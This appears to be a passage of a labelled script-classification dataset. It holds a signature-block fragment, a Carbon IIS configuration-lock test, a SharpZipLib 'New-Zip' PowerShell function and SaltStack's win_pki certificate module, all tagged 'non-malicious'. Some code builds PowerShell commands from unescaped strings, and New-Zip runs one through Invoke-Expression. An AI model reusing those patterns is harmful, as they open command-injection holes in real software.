Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv # cmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O # 1YLT/e6cBwfSqWxOdcjKNVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZn # hUYjDLWNE893MsAQGOhgfWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t # 1w/YJlN8OWECesSq/XJprx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxq # D89d9P6OU8/W7IVWTe/dvI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmP # frVUj9z6BVWYbWg7mka97aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSW # rAFKu75xqRdbZ2De+JKRHh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv # 231fgLrbqn427DZM9ituqBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zb # r17C89XYcz1DTsEzOUyOArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYcten # IPDC+hIK12NvDMk2ZItboKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQc # xWv2XFJRXRLbJbqvUAV6bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17a # j54WcmnGrnu3tz5q4i6tAgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQAB # MCMGCSsGAQQBgjcVAgQWBBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQU # n6cVXQBeYl2D9OXSZacbUzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEw # QTA/BggrBgEFBQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9E # b2NzL1JlcG9zaXRvcnkuaHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQB # gjcUAgQMHgoAUwB1AGIAQwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/ # MB8GA1UdIwQYMBaAFNX2VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJ # oEeGRWh0dHA6Ly9jcmwubWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01p # Y1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYB # BQUHMAKGPmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9v # Q2VyQXV0XzIwMTAtMDYtMjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3h # LB9nATEkW+Geckv8qW/qXBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x # 5MKP+2zRoZQYIu7pZmc6U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74p # y27YP0h1AdkY3m2CDPVtI1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1A # oL8ZthISEV09J+BAljis9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbC # HcNhcy4sa3tuPywJeBTpkbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB # 9s7GdP32THJvEKt1MMU0sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNt # yo4JvbMBV0lUZNlz138eW0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3 # rsjoiV5PndLQTHa1V1QJsWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcV # v7TOPqUxUYS8vwLBgqJ7Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A24 # 5oyZ1uEi6vAnQj0llOZ0dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lw # Y1NNje6CbaUFEMFxBmoQtB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB # 0jELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1Jl # ZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMk # TWljcm9zb2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1U # aGFsZXMgVFNTIEVTTjoxNzlFLTRCQjAtODI0NjElMCMGA1UEAxMcTWljcm9zb2Z0 # IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUAbfPR1fBX6HxYfyPx # 8zYzJU5fIQyggYMwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu # Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBv # cmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAN # BgkqhkiG9w0BAQUFAAIFAOljqP0wIhgPMjAyNDAxMzEwMDU3MzNaGA8yMDI0MDIw # MTAwNTczM1owdDA6BgorBgEEAYRZCgQBMSwwKjAKAgUA6WOo/QIBADAHAgEAAgIO # jjAHAgEAAgIRLDAKAgUA6WT6fQIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEE # AYRZCgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GB # AHX4mmrVIhR321NIkRQskncixVxOt1d5T1RZBqNhY9zEgt5gcphUt8YxJ6Y0opaP # YGAppGjAJIIPWnzN03MXzPP/A5eo3h07ekpoMT8a5QqQ3xbn/qDpBVoqrAbbD3/g # vnnTP4uIkZt0DKpJDuNytODK/wwQinKCRpvvnlwJwhrFMYIEDTCCBAkCAQEwgZMw # fDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1Jl # ZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMd # TWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAHg1PwfExUffl0AAQAA # AeAwDQYJYIZIAWUDBAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRAB # BDAvBgkqhkiG9w0BCQQxIgQgm90jNnOhDAR2zWuRXExNZYXLnxSrIh3JkSfXK8Vl # TM0wgfoGCyqGSIb3DQEJEAIvMYHqMIHnMIHkMIG9BCDj7lK/8jnlbTjPvc77DCCS # b4TZApY9nJm5whsK/2kKwTCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQI # EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv # ZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBD # QSAyMDEwAhMzAAAB4NT8HxMVH35dAAEAAAHgMCIEIMkzI6nfAcjbberq826ZOVn8 # b4giqXgpxyAVacCt7MZbMA0GCSqGSIb3DQEBCwUABIICADmmvY/bMNLqlPYs+8Uj # 6I730o/A3Nh3hEsic4v9Ki8BB1gfUn+8TCIMWQowLdl8REug9Nmdy94fNi58vqoo # xzmMdTWis87GxKb4wpnDupSp6IDTu9b8zj2KY8AaNv8th0/PI+3mOkFGj9MCysWu # pRrSGguuWcZyJVkTvLDTRtYBaDz7Lbe+EJxbLmw2YHhh2XYAWzNd+S4oPeTY313H # 6pAc4Obimm3KAM0GOGdxLJY2iDtqNlnlVrrwSWD2BgARHjprieAW7pOsYqIjzAYo # JyLj8HtPF7UbRQks2snf/MJmG5vCM+6HiNbLzrhBBlx0wgQ1PE8iSZXqc6aiPKxB # La8RBp8FlbuX2ANAazzY3gqS4N6sMWcds/ykXiwlF7rIY8MrDmfuK5cc8C0cope6 # BeU5bLGA+mbWTukkCiNOI5iEvkGvQOX6tZk6nfiTk6lzN6aVnaIEpAqS6JYh6Bby # X/TGWJ9GhiGbOY1eMNFSyDGYi2sTx6/y2FLsY68eExz1wH/8ZnYczOX4zR85ycsp # EI34bP/jwbs2ct/RyUT6G3U78R+oScHpfRcqXVymJOjTK2XpOR462/jaJRH50VYq # URC0KIbplAbY8KIFSXEmafCIUxUSt4sJhnH1fb7TBxTweW5YfXBHV63b9TCPnGBG # M+CIIZvZeYLyF/X12fMcg2lH # SIG # End signature block
combined_dataset/train/non-malicious/1118.ps1
1118.ps1
$windowsAuthWasLocked = $false $windowsAuthConfigPath = 'system.webServer/security/authentication/windowsAuthentication' $cgiConfigPath = 'system.webServer/cgi' function Start-TestFixture { & (Join-Path -Path $PSScriptRoot '..\Initialize-CarbonTest.ps1' -Resolve) } function Start-Test { $windowsAuthWasLocked = Test-IisConfigurationSection -SectionPath $windowsAuthConfigPath -Locked Unlock-IisConfigurationSection -SectionPath $windowsAuthConfigPath Assert-False (Test-IisConfigurationSection -SectionPath $windowsAuthConfigPath -Locked) $cgiWasLocked = Test-IisConfigurationSection -SectionPath $cgiConfigPath -Locked Unlock-IisConfigurationSection -SectionPath $cgiConfigPath Assert-False (Test-IisConfigurationSection -SectionPath $cgiConfigPath -Locked) } function Stop-Test { if( $windowsAuthWasLocked ) { Lock-IisConfigurationSection -SectionPath $windowsAuthConfigPath } else { Unlock-IisConfigurationSection -SectionPath $windowsAuthConfigPath } if( $cgiWasLocked ) { Lock-IisConfigurationSection -SectionPath $cgiConfigPath } else { Unlock-IisConfigurationSection -SectionPath $cgiConfigPath } $webConfigPath = Join-Path $TestDir web.config if( Test-Path -Path $webConfigPath ) { Remove-Item $webConfigPath } } function Test-ShouldLockOneConfigurationSection { Lock-IisConfigurationSection -SectionPath $windowsAuthConfigPath Assert-True (Test-IisConfigurationSection -SectionPath $windowsAuthConfigPath -Locked) } function Test-ShouldUnlockMultipleConfigurationSection { Lock-IisConfigurationSection -SectionPath $windowsAuthConfigPath,$cgiConfigPath Assert-True (Test-IisConfigurationSection -SectionPath $windowsAuthConfigPath -Locked) Assert-True (Test-IisConfigurationSection -SectionPath $cgiConfigPath -Locked) } function Test-ShouldSupportWhatIf { Assert-False (Test-IisConfigurationSection -SectionPath $windowsAuthConfigPath -Locked) Lock-IisConfigurationSection -SectionPath $windowsAuthConfigPath -WhatIf Assert-False (Test-IisConfigurationSection -SectionPath $windowsAuthConfigPath -Locked) }
combined_dataset/train/non-malicious/New-Zip.ps1
New-Zip.ps1
Function New-Zip { <# .SYNOPSIS Create a Zip File from any files piped in. .DESCRIPTION Requires that you have the SharpZipLib installed, which is available from http://www.icsharpcode.net/OpenSource/SharpZipLib/ .NOTES File Name : PowerZip.psm1 Author : Christophe CREMON (uxone) - http://powershell.codeplex.com Requires : PowerShell V2 .PARAMETER Source Set the name of the source to zip (file or directory) .PARAMETER ZipFile Set the name of the zip file to create .PARAMETER Recurse Browse the source recursively .PARAMETER Include Include only items you specify .PARAMETER Exclude Exclude items you specify .PARAMETER AbsolutePaths Preserve the absolute path name of each item in the zip container .PARAMETER DeleteAfterZip Delete source items after successful zip .EXAMPLE New-Zip -Source C:\\Temp -ZipFile C:\\Archive\\Scripts.zip -Include *.ps1 -DeleteAfterZip Copies all PS1 files from the C:\\Temp directory to C:\\Archive\\Scripts.zip and delete them after successful ZIP #> param ( [ValidateNotNullOrEmpty()] [Parameter( Mandatory = $true) ] [string] $Source, [Parameter( Mandatory = $true) ] [string] $ZipFile, [switch] $Recurse, [array] $Include, [array] $Exclude, [switch] $AbsolutePaths, [switch] $DeleteAfterZip ) [int] $ExitCode = 1 $LoadAssembly = [System.Reflection.Assembly]::LoadWithPartialName("ICSharpCode.SharpZipLib") if ( -not $LoadAssembly ) { throw "! Assembly not found {ICSharpCode.SharpZipLib}" } if ( $ZipFile -notmatch "\\.zip$" ) { $ZipFile = $ZipFile -replace "$",".zip" } if ( $Recurse -eq $true ) { $RecurseArgument = "-Recurse" } if ( $AbsolutePaths -eq $true ) { $AbsolutePathsArgument = "-AbsolutePaths" } if ( $DeleteAfterZip -eq $true ) { $DeleteAfterZipArgument = "-DeleteAfterZip" } if ( $Include ) { $Include = $Include -join "," $IncludeArgument = "-Include $Include" } if ( $Exclude ) { $Exclude = $Exclude -join "," $ExcludeArgument = "-Exclude $Exclude" } $RootPath = ( Resolve-Path -Path $Source -ErrorAction SilentlyContinue ).Path if ( -not $RootPath ) { throw "! Source not found {$Source}" } if ( $Include ) { $GetCommand = "Get-ChildItem -Path $Source\\* $RecurseArgument $IncludeArgument $ExcludeArgument -Force -ErrorAction SilentlyContinue" } else { $GetCommand = "Get-ChildItem -Path $Source $RecurseArgument $IncludeArgument $ExcludeArgument -Force -ErrorAction SilentlyContinue" } $ItemsToZip = Invoke-Expression -Command $GetCommand -ErrorAction SilentlyContinue $SizeBeforeZip = ( $ItemsToZip | Measure-Object -Property Length -Sum -ErrorAction SilentlyContinue ).Sum $SizeBeforeZipInMB = $SizeBeforeZip | ForEach-Object { "{0:N2}" -f ($_ / 1MB) } if ( -not $SizeBeforeZip ) { Write-Output "NOTHING TO ZIP" break } $StartTime = Get-Date Write-Output "`n===================================`n=> Start Time : $($StartTime.ToString(""dd/MM/yyyy-HH:mm:ss""))`n" Write-Output "TOTAL SIZE BEFORE ZIP : {$SizeBeforeZipInMB MB}`n" Write-Output "Initializing ZIP File {$ZipFile} ...`n" $CreateZIPContainer = New-Item -ItemType File -Path $ZipFile -Force -ErrorAction SilentlyContinue if ( -not $CreateZIPContainer ) { throw "! Unable to create ZIP container {$ZipFile}" } $oZipOutputStream = New-Object -TypeName ICSharpCode.SharpZipLib.Zip.ZipOutputStream([System.IO.File]::Create($ZipFile)) [byte[]] $Buffer = New-Object Byte[] 4096 foreach ( $Item in $ItemsToZip ) { if ( $Item.FullName -ne $ZipFile ) { if ( Test-Path ( $Item.FullName ) -ErrorAction SilentlyContinue ) { $ZipEntry = $Item.FullName if ( -not $AbsolutePaths ) { $ReplacePath = [Regex]::Escape( $RootPath+"\\" ) $ZipEntry = $Item.FullName -replace $ReplacePath,"" } if ( $Item.psIsContainer -eq $true ) { if ( $Recurse -eq $true ) { Write-Output "Processing ZIP of Directory {$($Item.FullName)} ..." $OldErrorActionPreference = $ErrorActionPreference $ErrorActionPreference = "SilentlyContinue" $oZipEntry = New-Object -TypeName ICSharpCode.SharpZipLib.Zip.ZipEntry("$ZipEntry/") $oZipOutputStream.PutNextEntry($oZipEntry) if ( $? -ne $true ) { $ItemsNotZipped += @($Item.FullName) $ErrorsArray += @("! Unable to ZIP Directory {$($Item.FullName)}") } $ErrorActionPreference = $OldErrorActionPreference } } else { Write-Output "Processing ZIP of File {$($Item.FullName)} ..." $OldErrorActionPreference = $ErrorActionPreference $ErrorActionPreference = "SilentlyContinue" $FileStream = [IO.File]::OpenRead($Item.FullName) $oZipEntry = New-Object -TypeName ICSharpCode.SharpZipLib.Zip.ZipEntry("$ZipEntry") $oZipOutputStream.PutNextEntry($oZipEntry) [ICSharpCode.SharpZipLib.Core.StreamUtils]::Copy($FileStream,$oZipOutputStream,$Buffer) if ( $? -ne $true ) { $ItemsNotZipped += @($Item.FullName) $ErrorsArray += @("! Unable to ZIP File {$($Item.FullName)}") } $FileStream.Close() } } } } $oZipOutputStream.Finish() $oZipOutputStream.Close() if ( $? -eq $true ) { $ErrorActionPreference = $OldErrorActionPreference if ( $DeleteAfterZip ) { $ItemsToZip | Where-Object { $ItemsNotZipped -notcontains $_.FullName } | ForEach-Object { if ( $_.psIsContainer -ne $true ) { if ( Test-Path ( $_.FullName ) -ErrorAction SilentlyContinue ) { Write-Output "Processing Delete of File {$($_.FullName)} ..." $RemoveItem = Remove-Item -Path $_.FullName -Force -ErrorAction SilentlyContinue if ( $? -ne $true ) { $ErrorsArray += @("! Unable to Delete File {$($_.FullName)}") } } } } if ( $Recurse ) { $ItemsToZip | Where-Object { $ItemsNotZipped -notcontains ( Split-Path -Parent $_.FullName ) } | ForEach-Object { if ( $_.psIsContainer -eq $true ) { if ( Test-Path ( $_.FullName ) -ErrorAction SilentlyContinue ) { Write-Output "Processing Delete of Directory {$($_.FullName)} ..." $RemoveItem = Remove-Item -Path $_.FullName -Force -Recurse -ErrorAction SilentlyContinue if ( $? -ne $true ) { $ErrorsArray += @("! Unable to Delete Directory {$($_.FullName)}") } } } } } } Write-Output "`nZIP File Created {$ZipFile} ...`n" $ExitCode = 0 } else { $ErrorActionPreference = $OldErrorActionPreference $ErrorsArray += @("! ZIP Archive {$ZipFile} Creation Failed`n") } if ( $ErrorsArray ) { Write-Output "`n[ ERRORS OCCURED ]" $ErrorsArray $ExitCode = 1 } else { $SizeAfterZip = ( Get-Item -Path $ZipFile -Force -ErrorAction SilentlyContinue | Measure-Object -Property Length -Sum -ErrorAction SilentlyContinue ).Sum $SizeAfterZipInMB = $SizeAfterZip | ForEach-Object { "{0:N2}" -f ($_ / 1MB) } Write-Output "`nTOTAL SIZE AFTER ZIP : {$SizeAfterZipInMB MB}`n" $Gain = ( $SizeBeforeZip - $SizeAfterZip ) $GainInMB = $Gain | ForEach-Object { "{0:N2}" -f ($_ / 1MB) } if ( $Gain -gt 0 ) { $GainInPercent = (($SizeBeforeZip - $SizeAfterZip) / $SizeBeforeZip) * 100 | ForEach-Object { "{0:N2}" -f $_ } Write-Output "GAIN : {$GainInMB MB} ($GainInPercent %)`n" } } $EndTime = Get-Date $ExecutionTime = ($EndTime-$StartTime) Write-Output "`nExecution Time : $ExecutionTime`n" Write-Output "=> End Time : $($EndTime.ToString(""dd/MM/yyyy-HH:mm:ss""))`n=================================`n" exit $ExitCode } Export-ModuleMember -Function New-Zip
combined_dataset/train/non-malicious/sample_25_67.ps1
sample_25_67.ps1
""" Microsoft certificate management via the PKI Client PowerShell module. https://technet.microsoft.com/en-us/itpro/powershell/windows/pkiclient/pkiclient The PKI Client PowerShell module is only available on Windows 8+ and Windows Server 2012+. https://technet.microsoft.com/en-us/library/hh848636(v=wps.620).aspx :platform: Windows :depends: - PowerShell 4 - PKI Client Module (Windows 8+ / Windows Server 2012+) .. versionadded:: 2016.11.0 """ import ast import logging import os import salt.utils.json import salt.utils.platform import salt.utils.powershell import salt.utils.versions from salt.exceptions import CommandExecutionError, SaltInvocationError _DEFAULT_CONTEXT = "LocalMachine" _DEFAULT_FORMAT = "cer" _DEFAULT_STORE = "My" _LOG = logging.getLogger(__name__) # Define the module's virtual name __virtualname__ = "win_pki" def __virtual__(): """ Requires Windows Requires Windows 8+ / Windows Server 2012+ Requires PowerShell Requires PKI Client PowerShell module installed. """ if not salt.utils.platform.is_windows(): return False, "Only available on Windows Systems" if salt.utils.versions.version_cmp(__grains__["osversion"], "6.2.9200") == -1: return False, "Only available on Windows 8+ / Windows Server 2012 +" if not __salt__["cmd.shell_info"]("powershell")["installed"]: return False, "Powershell not available" if not salt.utils.powershell.module_exists("PKI"): return False, "PowerShell PKI module not available" return __virtualname__ def _cmd_run(cmd, as_json=False): """ Ensure that the Pki module is loaded, and convert to and extract data from Json as needed. """ cmd_full = ["Import-Module -Name PKI; "] if as_json: cmd_full.append( r"ConvertTo-Json -Compress -Depth 4 -InputObject " r"@({})".format(cmd) ) else: cmd_full.append(cmd) cmd_ret = __salt__["cmd.run_all"]( "".join(cmd_full), shell="powershell", python_shell=True ) if cmd_ret["stderr"]: raise CommandExecutionError( "Unable to execute command: {}\nError: {}".format(cmd, cmd_ret["stderr"]) ) if as_json: try: items = salt.utils.json.loads(cmd_ret["stdout"], strict=False) return items except ValueError: raise CommandExecutionError( "Unable to parse return data as JSON:\n{}".format(cmd_ret["stdout"]) ) return cmd_ret["stdout"] def _validate_cert_path(name): """ Ensure that the certificate path, as determind from user input, is valid. """ cmd = rf"Test-Path -Path '{name}'" if not ast.literal_eval(_cmd_run(cmd=cmd)): raise SaltInvocationError(rf"Invalid path specified: {name}") def _validate_cert_format(name): """ Ensure that the certificate format, as determind from user input, is valid. """ cert_formats = ["cer", "pfx"] if name not in cert_formats: raise SaltInvocationError( "Invalid certificate format '{}' specified. Valid formats: {}".format( name, cert_formats ) ) def get_stores(): """ Get the certificate location contexts and their corresponding stores. :return: A dictionary of the certificate location contexts and stores. :rtype: dict CLI Example: .. code-block:: bash salt '*' win_pki.get_stores """ ret = dict() cmd = r"Get-ChildItem -Path 'Cert:\' | Select-Object LocationName, StoreNames" items = _cmd_run(cmd=cmd, as_json=True) for item in items: ret[item["LocationName"]] = list() for store in item["StoreNames"]: ret[item["LocationName"]].append(store) return ret def get_certs(context=_DEFAULT_CONTEXT, store=_DEFAULT_STORE): """ Get the available certificates in the given store. :param str context: The name of the certificate store location context. :param str store: The name of the certificate store. :return: A dictionary of the certificate thumbprints and properties. :rtype: dict CLI Example: .. code-block:: bash salt '*' win_pki.get_certs """ ret = dict() cmd = list() blacklist_keys = ["DnsNameList"] store_path = rf"Cert:\{context}\{store}" _validate_cert_path(name=store_path) cmd.append(rf"Get-ChildItem -Path '{store_path}' | Select-Object") cmd.append(" DnsNameList, SerialNumber, Subject, Thumbprint, Version") items = _cmd_run(cmd="".join(cmd), as_json=True) for item in items: cert_info = dict() for key in item: if key not in blacklist_keys: cert_info[key.lower()] = item[key] names = item.get("DnsNameList", None) if isinstance(names, list): cert_info["dnsnames"] = [name.get("Unicode") for name in names] else: cert_info["dnsnames"] = [] ret[item["Thumbprint"]] = cert_info return ret def get_cert_file(name, cert_format=_DEFAULT_FORMAT, password=""): """ Get the details of the certificate file. :param str name: The filesystem path of the certificate file. :param str cert_format: The certificate format. Specify 'cer' for X.509, or 'pfx' for PKCS #12. :param str password: The password of the certificate. Only applicable to pfx format. Note that if used interactively, the password will be seen by all minions. To protect the password, use a state and get the password from pillar. :return: A dictionary of the certificate thumbprints and properties. :rtype: dict CLI Example: .. code-block:: bash salt '*' win_pki.get_cert_file name='C:\\certs\\example.cer' """ ret = dict() cmd = list() blacklist_keys = ["DnsNameList"] cert_format = cert_format.lower() _validate_cert_format(name=cert_format) if not name or not os.path.isfile(name): _LOG.error("Path is not present: %s", name) return ret if cert_format == "pfx": if password: cmd.append("$CertObject = New-Object") cmd.append( " System.Security.Cryptography.X509Certificates.X509Certificate2;" ) cmd.append(rf" $CertObject.Import('{name}'") cmd.append(f",'{password}'") cmd.append(",'DefaultKeySet') ; $CertObject") cmd.append( " | Select-Object DnsNameList, SerialNumber, Subject, " "Thumbprint, Version" ) else: cmd.append(rf"Get-PfxCertificate -FilePath '{name}'") cmd.append( " | Select-Object DnsNameList, SerialNumber, Subject, " "Thumbprint, Version" ) else: cmd.append("$CertObject = New-Object") cmd.append(" System.Security.Cryptography.X509Certificates.X509Certificate2;") cmd.append(rf" $CertObject.Import('{name}'); $CertObject") cmd.append( " | Select-Object DnsNameList, SerialNumber, Subject, Thumbprint, Version" ) items = _cmd_run(cmd="".join(cmd), as_json=True) for item in items: for key in item: if key not in blacklist_keys: ret[key.lower()] = item[key] ret["dnsnames"] = [name["Unicode"] for name in item["DnsNameList"]] if ret: _LOG.debug("Certificate thumbprint obtained successfully: %s", name) else: _LOG.error("Unable to obtain certificate thumbprint: %s", name) return ret def import_cert( name, cert_format=_DEFAULT_FORMAT, context=_DEFAULT_CONTEXT, store=_DEFAULT_STORE, exportable=True, password="", saltenv="base", ): """ Import the certificate file into the given certificate store. :param str name: The path of the certificate file to import. :param str cert_format: The certificate format. Specify 'cer' for X.509, or 'pfx' for PKCS #12. :param str context: The name of the certificate store location context. :param str store: The name of the certificate store. :param bool exportable: Mark the certificate as exportable. Only applicable to pfx format. :param str password: The password of the certificate. Only applicable to pfx format. Note that if used interactively, the password will be seen by all minions. To protect the password, use a state and get the password from pillar. :param str saltenv: The environment the file resides in. :return: A boolean representing whether all changes succeeded. :rtype: bool CLI Example: .. code-block:: bash salt '*' win_pki.import_cert name='salt://cert.cer' """ cmd = list() thumbprint = None store_path = rf"Cert:\{context}\{store}" cert_format = cert_format.lower() _validate_cert_format(name=cert_format) cached_source_path = __salt__["cp.cache_file"](name, saltenv) if not cached_source_path: _LOG.error("Unable to get cached copy of file: %s", name) return False if password: cert_props = get_cert_file( name=cached_source_path, cert_format=cert_format, password=password ) else: cert_props = get_cert_file(name=cached_source_path, cert_format=cert_format) current_certs = get_certs(context=context, store=store) if cert_props["thumbprint"] in current_certs: _LOG.debug( "Certificate thumbprint '%s' already present in store: %s", cert_props["thumbprint"], store_path, ) return True if cert_format == "pfx": # In instances where an empty password is needed, we use a # System.Security.SecureString object since ConvertTo-SecureString will # not convert an empty string. if password: cmd.append( r"$Password = ConvertTo-SecureString " r"-String '{}'".format(password) ) cmd.append(" -AsPlainText -Force; ") else: cmd.append("$Password = New-Object System.Security.SecureString; ") cmd.append( r"Import-PfxCertificate " r"-FilePath '{}'".format(cached_source_path) ) cmd.append(rf" -CertStoreLocation '{store_path}'") cmd.append(r" -Password $Password") if exportable: cmd.append(" -Exportable") else: cmd.append(r"Import-Certificate " r"-FilePath '{}'".format(cached_source_path)) cmd.append(rf" -CertStoreLocation '{store_path}'") _cmd_run(cmd="".join(cmd)) new_certs = get_certs(context=context, store=store) for new_cert in new_certs: if new_cert not in current_certs: thumbprint = new_cert if thumbprint: _LOG.debug("Certificate imported successfully: %s", name) return True _LOG.error("Unable to import certificate: %s", name) return False def export_cert( name, thumbprint, cert_format=_DEFAULT_FORMAT, context=_DEFAULT_CONTEXT, store=_DEFAULT_STORE, password="", ): """ Export the certificate to a file from the given certificate store. :param str name: The destination path for the exported certificate file. :param str thumbprint: The thumbprint value of the target certificate. :param str cert_format: The certificate format. Specify 'cer' for X.509, or 'pfx' for PKCS #12. :param str context: The name of the certificate store location context. :param str store: The name of the certificate store. :param str password: The password of the certificate. Only applicable to pfx format. Note that if used interactively, the password will be seen by all minions. To protect the password, use a state and get the password from pillar. :return: A boolean representing whether all changes succeeded. :rtype: bool CLI Example: .. code-block:: bash salt '*' win_pki.export_cert name='C:\\certs\\example.cer' thumbprint='AAA000' """ cmd = list() thumbprint = thumbprint.upper() cert_path = rf"Cert:\{context}\{store}\{thumbprint}" cert_format = cert_format.lower() _validate_cert_path(name=cert_path) _validate_cert_format(name=cert_format) if cert_format == "pfx": # In instances where an empty password is needed, we use a # System.Security.SecureString object since ConvertTo-SecureString will # not convert an empty string. if password: cmd.append( r"$Password = ConvertTo-SecureString " r"-String '{}'".format(password) ) cmd.append(" -AsPlainText -Force; ") else: cmd.append("$Password = New-Object System.Security.SecureString; ") cmd.append( r"Export-PfxCertificate " r"-Cert '{}' -FilePath '{}'".format(cert_path, name) ) cmd.append(r" -Password $Password") else: cmd.append( r"Export-Certificate " r"-Cert '{}' -FilePath '{}'".format(cert_path, name) ) cmd.append(rf" | Out-Null; Test-Path -Path '{name}'") ret = ast.literal_eval(_cmd_run(cmd="".join(cmd))) if ret: _LOG.debug("Certificate exported successfully: %s", name) else: _LOG.error("Unable to export certificate: %s", name) return ret def test_cert( thumbprint, context=_DEFAULT_CONTEXT, store=_DEFAULT_STORE, untrusted_root=False, dns_name="", eku="", ): """ Check the certificate for validity. :param str thumbprint: The thumbprint value of the target certificate. :param str context: The name of the certificate store location context. :param str store: The name of the certificate store. :param bool untrusted_root: Whether the root certificate is required to be trusted in chain building. :param str dns_name: The DNS name to verify as valid for the certificate. :param str eku: The enhanced key usage object identifiers to verify for the certificate chain. :return: A boolean representing whether the certificate was considered valid. :rtype: bool CLI Example: .. code-block:: bash salt '*' win_pki.test_cert thumbprint='AAA000' dns_name='example.test' """ cmd = list() thumbprint = thumbprint.upper() cert_path = rf"Cert:\{context}\{store}\{thumbprint}" cmd.append(rf"Test-Certificate -Cert '{cert_path}'") _validate_cert_path(name=cert_path) if untrusted_root: cmd.append(" -AllowUntrustedRoot") if dns_name: cmd.append(f" -DnsName '{dns_name}'") if eku: cmd.append(f" -EKU '{eku}'") cmd.append(" -ErrorAction SilentlyContinue") return ast.literal_eval(_cmd_run(cmd="".join(cmd))) def remove_cert(thumbprint, context=_DEFAULT_CONTEXT, store=_DEFAULT_STORE): """ Remove the certificate from the given certificate store. :param str thumbprint: The thumbprint value of the target certificate. :param str context: The name of the certificate store location context. :param str store: The name of the certificate store. :return: A boolean representing whether all changes succeeded. :rtype: bool CLI Example: .. code-block:: bash salt '*' win_pki.remove_cert thumbprint='AAA000' """ thumbprint = thumbprint.upper() store_path = rf"Cert:\{context}\{store}" cert_path = rf"{store_path}\{thumbprint}" cmd = rf"Remove-Item -Path '{cert_path}'" current_certs = get_certs(context=context, store=store) if thumbprint not in current_certs: _LOG.debug( "Certificate '%s' already absent in store: %s", thumbprint, store_path ) return True _validate_cert_path(name=cert_path) _cmd_run(cmd=cmd) new_certs = get_certs(context=context, store=store) if thumbprint in new_certs: _LOG.error("Unable to remove certificate: %s", cert_path) return False _LOG.debug("Certificate removed successfully: %s", cert_path) return True
combined_dataset/train/non-malicious/sample_16_29.ps1
sample_16_29.ps1
